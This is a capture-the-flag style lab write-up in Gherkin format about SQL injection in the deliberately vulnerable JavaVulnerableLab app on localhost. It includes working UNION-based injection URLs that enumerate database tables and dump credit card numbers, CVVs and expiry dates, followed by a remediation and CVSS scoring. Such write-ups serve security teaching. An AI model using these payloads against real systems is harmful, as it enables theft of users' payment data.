## Version 1.4.1
## language: en

Feature:

  TOE:
    JavaVulnerableLab
  Location:
    http://http://127.0.0.1:8080/JavaVulnerableLab/
  CWE:
    CWE-0089: Improper Neutralization of Special Elements used in SQL command
  Rule:
    Rule.169 Use parametrized queries
    Rule.173 Discard unsafe inputs
  Goal:
    Detect and exploit SQL injection vulnerability
  Recommendation:
    Sanitize SQL queries to avoid injections

  Background:
  Hacker's software:
    | <Software name> |  <Version>  |
    | Ubuntu          |     20.4    |
    | Mozilla firefox |     80.0    |
  TOE information:
    Given I am accessing locally to the site 127.0.0.1:8080/JavaVulnerableLab
    And I enter the site
    When it shows me a message
    """
    Welcome to Java Vulnerable Lab!

    A Deliberately vulnerable Web Application built on JAVA designed to
    teach Web Application Security.
    """
    And the copyrights belong to Cyber Security & Privacy Foundation
    Then I can see that uses MySQL
    And I can conclude that query chaining is not possible


  Scenario: Normal use case
    Given I access to the site
    And I see a buttons bar with six different options
    """
    Home, Vulnerability, Forum, Login, Register, Contact
    """
    Then I place the cursor on Vulnerability and a dropdown list is displayed
    And I navigate through the option to finally end up in sql injection 1
    """
    Vulnerability > A1 injection > SQL injection > sql injection 1
    """
    Then I can see [evidence](image1.png)
    And this page shows me a post made by admin where it says
    """
    Title:First Post
    - Posted By admin

    Content:
    Feel free to ask any questions about Java Vulnerable Lab
    """

  Scenario: Static detection #
    When I see the URL
    And I conclude that postid = 1 comes from forumposts.jsp
    """
    127.0.0.1:8080/JavaVulnerableLab/vulnerability/forumposts.jsp?postid=1
    """
    Then I go to the file
    And I can see that the vulnerability is caused from line 9 to line 14
    """
    9 String postid=request.getParameter("postid");
    10 if(postid!=null)
    11 {
    12   Statement stmt = con.createStatement();
    13        ResultSet rs =null;
    14        rs=stmt.executeQuery("select * from posts where postid="+postid);
    """
    Then I can conclude that the input 'postid' is not validated
    And it allows SQL injection

  Scenario: Dynamic detection
    Given I access the site
    And I try a simple true and false SQL injection
    Then I add sql query in the url:
    """
    forumposts.jsp?postid=1 and 1=1
    """
    And as '1=1' is a true statement the page reload[evidence](image2.png)
    Then I try with a false statement in the url:
    """
    forumposts.jsp?postid=1 and 1=2
    """
    And the page reload but it doesn't show something[evidence](image2.png)
    Then I can conclude that the page is vulnerable to SQL injections

  Scenario: Exploitation
    Given the site of any post
    Then I can excute the following command in the url:
    """
    forumposts.jsp?postid=1 union select 1
    """
    And it shows me an error [evidence](image4.png)
    Then I try:
    """
    forumposts.jsp?postid=1 union select 1,2
    """
    And it shows the same error
    Then I continue with this sequence
    When it reaload the page [evidence](image5.png) with:
    """
    forumposts.jsp?postid=1 union select 1,2,3,4
    """
    Then I can conclude that the table has 4 columns
    And I can change 'postid' for a invalid index to display union select
    """
    ?postid=-2 union select 1,2,3,4
    """
    Then I see where each column is placed in the page[evidence](image6.png)
    And I can use group_concat command to see the name of other tables
    """
    ?postid=-1 union select 1,2,3, group_concat(table_name)
        from information_schema.tables where table_schema = database()
    """
    Then I get the names of other tables[evidence](image7.png)
    And a realized that there's a cards table
    Then I search for the names of the columns using the following command:
    """
    postid=-1 union select 1,2,3, group_concat(column_name)
        from information_schema.columns where table_name = 'cards'
    """
    Then I get the name of the columns[evidence](image8.png)
    And I can get the cards information using the following command:
    """
    postid=-1
    union select 1,2,3, group_concat(cardno, '-' , cvv,'-', expirydate)
    from cards
    """
    When I get the information about the credit cards[evidence](image9.png).

  Scenario: Remediation
    Given I add a try-except statement to handle error
    Then parse the str to int to validate a correct input for 'postid'
    And the final code will be the following:
    """
    String postid=request.getParameter("postid");
    if(postid!=null)
    {
        try
        {
        int numberID = Integer.parseInt(postid);
        Statement stmt = con.createStatement();
        ResultSet rs =null;
        rs=stmt.executeQuery("select * from posts where postid="+numberID);
        if(rs != null && rs.next())
        {
            out.print("<b style='font-size:22px'>Title:"+rs.getString("title")+
            "</b>");
            out.print("<br/>-  Posted By "+rs.getString("user"));
            out.print("<br/><br/>Content:<br/>"+rs.getString("content"));
        }

        }
        catch(Exception e)
        {
            out.print("Something went wrong!");
        }
    """
    Then I can confirm that the vulnerability was successfully patched

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    7.4/10 (High) - AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N/
  Temporal: Attributes that measure the exploit's popularity and fixability
    6.3/10 (Medium) - E:H/RL:O/RC:U/
  Environmental: Unique and relevant attributes to a specific user environment
    8.4/10 (High) - CR:H/IR:L/AR:L/

  Scenario: Correlations
    No correlations have been found to this date {2020-08-31}
